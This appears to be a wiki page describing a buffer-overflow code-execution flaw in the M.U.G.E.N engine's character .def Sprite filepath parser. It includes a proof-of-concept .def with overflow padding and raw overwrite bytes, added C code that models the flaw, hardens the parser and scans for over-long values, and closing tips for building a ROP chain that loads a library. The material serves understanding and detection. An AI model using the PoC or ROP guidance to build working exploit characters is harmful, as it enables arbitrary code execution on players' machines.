
[Image] Proof-of-concept character, created by Takex, to show the existence of this vulnerability. Functional in 1.0 and 1.1.
Sprite Filepath Overflow, technically known as the Definition File's Sprite Filepath Buffer Overflow Attack, is a vulnerability in M.U.G.E.N 1.0 and higher that allows arbitrary code execution during the engine's initialization stage.
It is the equivalent of the Incorrect ZLib Library Build exploit for these versions: it also fires at the moment the engine loads the character list file, select.def, which makes it a good alternative in builds where that exploit is not available.
The vulnerability has two main limitations, execution order and payload size. Only one exploit can be executed per select.def, it has to be placed on the last select line, and the payload is limited to a maximum of 512 bytes.
Exploit Details
As the technical name implies, the attack takes advantage of a buffer overflow in the definition file's text parser, specifically in its handling of the Sprite filepath line, which is used to pre-load character portraits and icons for the selection screen. The parser's buffer for this value is 512 bytes; when a Sprite filepath line exceeds that size, the excess data overwrites the parser's saved return address, and the engine resumes execution wherever the overwritten address points, resulting in arbitrary code execution. In practice this means any character whose .def carries a Sprite value of 512 bytes or more should be treated as a payload rather than a character, and can be detected by a simple length check before the file is ever loaded.
The PoC character's .def file. The Sprite value is padding up to the buffer size, and the trailing non-ASCII characters are the raw bytes of the overwrite:

[Info]
Name = ""
DisplayName = ""

[Files]
Sprite = 00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000¨(Ÿk
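To make the parser-side defect and the corresponding check concrete, here is an added example; it is not the page's or MUGEN's code. It is a small C model of a `[Files]` `Sprite = ...` parser with a 512-byte buffer, written once in the unbounded form the page describes and once in a bounded form that refuses over-long values, together with a pre-load scanner that flags any .def text whose Sprite value would overflow the buffer. The header text, the 600-byte filler and the four placeholder tail bytes are constructed here to mirror the layout of the PoC above; none of them is a real address or gadget.

```c
#include <ctype.h>
#include <stdbool.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Buffer size the page gives for the Sprite filepath parser. */
#define SPRITE_BUF 512

/* Point past "key =" and any following blanks; NULL if the line has no '='. */
static const char *value_of(const char *line)
{
    const char *v = strchr(line, '=');
    if (!v)
        return NULL;
    v++;
    while (*v == ' ' || *v == '\t')
        v++;
    return v;
}

/* Vulnerable pattern (a model of what the page describes, not MUGEN's code):
 * fixed-size buffer, unbounded copy. A value of SPRITE_BUF bytes or more runs
 * past out[] into whatever the caller keeps behind it. Never feed it untrusted input. */
static size_t sprite_value_unsafe(const char *line, char out[SPRITE_BUF])
{
    const char *v = value_of(line);
    if (!v)
        return 0;
    strcpy(out, v);                    /* no bound: this is the overflow */
    out[strcspn(out, "\r\n")] = '\0';
    return strlen(out);
}

/* Hardened form: measure first, refuse anything that would not fit (no silent
 * truncation, which would hide a tampered file), then do a bounded copy. */
static bool sprite_value_safe(const char *line, char *out, size_t outsz)
{
    const char *v = value_of(line);
    if (!v)
        return false;
    size_t n = strcspn(v, "\r\n");
    if (n >= outsz)
        return false;
    memcpy(out, v, n);
    out[n] = '\0';
    return true;
}

/* ASCII case-insensitive prefix test; returns the text after the prefix or NULL. */
static const char *ci_prefix(const char *s, const char *pre)
{
    for (; *pre; s++, pre++)
        if (tolower((unsigned char)*s) != tolower((unsigned char)*pre))
            return NULL;
    return s;
}

/* Pre-load check: longest Sprite value (in bytes) in the [Files] section of a
 * .def text. A result of SPRITE_BUF or more would overflow the parser above. */
static size_t longest_sprite_value(const char *def)
{
    size_t longest = 0;
    bool in_files = false;
    for (const char *p = def; *p;) {
        size_t len = strcspn(p, "\n");
        char *line = malloc(len + 1);
        if (!line)
            break;
        memcpy(line, p, len);
        line[len] = '\0';
        const char *s = line;
        while (*s == ' ' || *s == '\t')
            s++;
        if (*s == '[') {
            in_files = ci_prefix(s, "[files]") != NULL;
        } else if (in_files) {
            const char *rest = ci_prefix(s, "sprite");
            while (rest && (*rest == ' ' || *rest == '\t'))
                rest++;
            if (rest && *rest == '=') {
                size_t n = strcspn(value_of(rest), "\r");
                if (n > longest)
                    longest = n;
            }
        }
        free(line);
        p += len;
        if (*p == '\n')
            p++;
    }
    return longest;
}

static bool def_is_suspicious(const char *def)
{
    return longest_sprite_value(def) >= SPRITE_BUF;
}

/* Constructed sample in the layout of the PoC: the usual header, then a Sprite
 * value of `pad` filler bytes followed by four tail bytes standing in for the
 * return-address overwrite. The tail is a placeholder, not a real address. */
static char *build_poc_def(size_t pad, const char tail[4])
{
    static const char head[] = "[Info]\nName = \"\"\nDisplayName = \"\"\n\n[Files]\nSprite = ";
    size_t hl = sizeof head - 1;
    char *def = malloc(hl + pad + 4 + 2);
    if (!def)
        return NULL;
    memcpy(def, head, hl);
    memset(def + hl, '0', pad);
    memcpy(def + hl + pad, tail, 4);
    def[hl + pad + 4] = '\n';
    def[hl + pad + 5] = '\0';
    return def;
}

int main(void)
{
    char buf[SPRITE_BUF];
    char *poc = build_poc_def(600, "\xef\xbe\xad\xde");  /* placeholder tail bytes */
    printf("benign line: unbounded parser copies %zu bytes\n",
           sprite_value_unsafe("Sprite = kfm.sff", buf));
    printf("PoC: longest Sprite value %zu bytes, suspicious: %s\n",
           longest_sprite_value(poc), def_is_suspicious(poc) ? "yes" : "no");
    printf("PoC line accepted by hardened parser: %s\n",
           sprite_value_safe(strstr(poc, "Sprite ="), buf, sizeof buf) ? "yes" : "no");
    free(poc);
    return 0;
}
```

The scanner is the part worth keeping around: run `longest_sprite_value` over every character .def referenced from select.def before launching the engine, and refuse any file that reports 512 bytes or more. The hardened parser rejects a value of exactly 512 bytes too, since the terminating NUL also has to fit in the buffer. The unbounded function is there only to show the pattern; it is called with a short, constructed line and must never be given file contents you do not control.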
Creation Tips
Because of the limited payload space, it is preferable to build a ROP chain that loads a library into the engine process, typically by returning into a library-loading routine, so that the full version of the character, along with any additional functionality, can be loaded asynchronously from that library instead of being squeezed into the 512 bytes available on the Sprite line.